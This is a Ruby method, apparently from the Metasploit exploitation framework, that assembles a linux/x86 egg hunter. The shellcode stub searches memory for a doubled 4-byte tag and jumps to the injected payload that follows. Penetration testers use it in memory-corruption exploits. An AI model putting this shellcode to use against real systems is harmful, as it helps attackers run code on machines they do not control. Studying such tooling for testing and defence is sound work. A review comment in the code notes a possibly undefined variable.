The egg hunter stub for linux/x86.
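# File lib/rex/exploitation/egghunter.rb, line 246
#
# Builds and assembles the linux/x86 egg hunter stub.
#
# The generated code scans memory for the 4-byte tag given in
# opts[:eggtag], requires it to appear twice back-to-back (see the
# two scasd checks under check_for_tag), optionally verifies the
# checksum emitted by checksum_stub, and then jumps to what follows.
# The check_readable / next_addr section uses the 'sigaction' syscall
# as a probe before touching each page, as the assembly comments note.
#
# @param payload  [String] the payload the egg precedes; passed through
#   to checksum_stub, which decides whether a checksum section is emitted
# @param badchars [String] bytes the checksum stub must avoid (passed
#   through to checksum_stub)
# @param opts     [Hash] :eggtag (String, required, exactly 4 bytes) and
#   :startreg (optional String naming the register that already holds
#   the address the search should start from)
# @return [String] the assembled stub bytes
# @raise [RuntimeError] when :eggtag is missing or not exactly 4 bytes
def hunter_stub(payload, badchars = '', opts = {})
  startreg = opts[:startreg]

  # to_s lets a missing :eggtag surface as the documented RuntimeError
  # instead of a NoMethodError on nil. bytesize rather than length because
  # the tag is consumed as one little-endian dword (unpack 'V') and compared
  # with scasd, so a multibyte 4-character string would not be a valid tag.
  eggtag = opts[:eggtag].to_s
  # NOTE(review): esize is not defined in this method; confirm it exists in
  # the enclosing class, otherwise taking this branch raises NameError.
  raise RuntimeError, "Invalid egg string! Need #{esize} bytes." if eggtag.bytesize != 4

  marker = format('0x%x', eggtag.unpack('V').first)
  checksum = checksum_stub(payload, badchars, opts)

  # When a start register is supplied, seed ecx from it (unless it already
  # is ecx) and skip straight to next_addr so the initial page step is not
  # applied to the caller's address.
  startstub = ''
  if startreg
    startstub = if startreg.downcase == 'ecx'
                  "\n\tjmp next_addr"
                else
                  "\n\tmov ecx,#{startreg}\n\tjmp next_addr"
                end
    startstub += "\n\t"
  end

  assembly = <<~ASM
    cld#{startstub}
    check_readable:
    \tor cx,0xfff
    next_addr:
    \tinc ecx
    \tpush 0x43        ; use 'sigaction' syscall
    \tpop eax
    \tint 0x80
    \tcmp al,0xf2
    \tje check_readable
    check_for_tag:
    \t; check that the tag matches once
    \tmov eax,#{marker}
    \tmov edi,ecx
    \tscasd
    \tjne next_addr
    \t; it must match a second time too
    \tscasd
    \tjne next_addr
    \t; check the checksum if the feature is enabled
    #{checksum}
    \t; jump to the payload
    \tjmp edi
  ASM

  # The assembled bytes are the return value.
  Metasm::Shellcode.assemble(Metasm::Ia32.new, assembly).encode_string
end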